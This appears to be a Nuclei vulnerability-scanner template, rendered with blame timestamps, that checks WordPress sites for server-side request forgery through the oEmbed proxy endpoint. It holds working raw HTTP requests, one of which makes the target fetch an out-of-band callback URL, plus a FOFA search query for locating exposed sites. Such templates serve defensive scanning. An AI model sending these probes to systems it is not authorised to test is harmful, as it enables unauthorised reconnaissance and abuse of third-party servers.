nuclei-templates/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml

35 lines
872 B
YAML
Raw Normal View History

2021-12-16 08:18:34 +00:00
id: wordpress-ssrf-oembed
info:
2023-09-04 18:13:10 +00:00
name: Wordpress Oembed Proxy - Server-side request forgery
2021-12-16 08:18:34 +00:00
author: dhiyaneshDk
2021-12-16 08:55:00 +00:00
severity: medium
2021-12-16 08:18:34 +00:00
reference:
- https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
- https://github.com/incogbyte/quickpress/blob/master/core/req.go
metadata:
max-request: 2
2023-10-14 11:27:55 +00:00
fofa-query: body="oembed" && body="wp-"
2023-09-04 18:13:10 +00:00
tags: wordpress,ssrf,oast,oembed
2021-12-16 08:18:34 +00:00
http:
2023-09-04 18:13:10 +00:00
- raw:
- |
GET /wp-json/oembed/1.0/proxy HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
2021-12-16 08:55:00 +00:00
2023-09-02 23:13:32 +00:00
matchers-condition: and
2021-12-16 08:18:34 +00:00
matchers:
2023-09-04 18:13:10 +00:00
- type: word
part: body_1
words:
- 'rest_missing_callback_param'
2023-09-02 23:13:32 +00:00
2023-09-04 18:13:10 +00:00
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"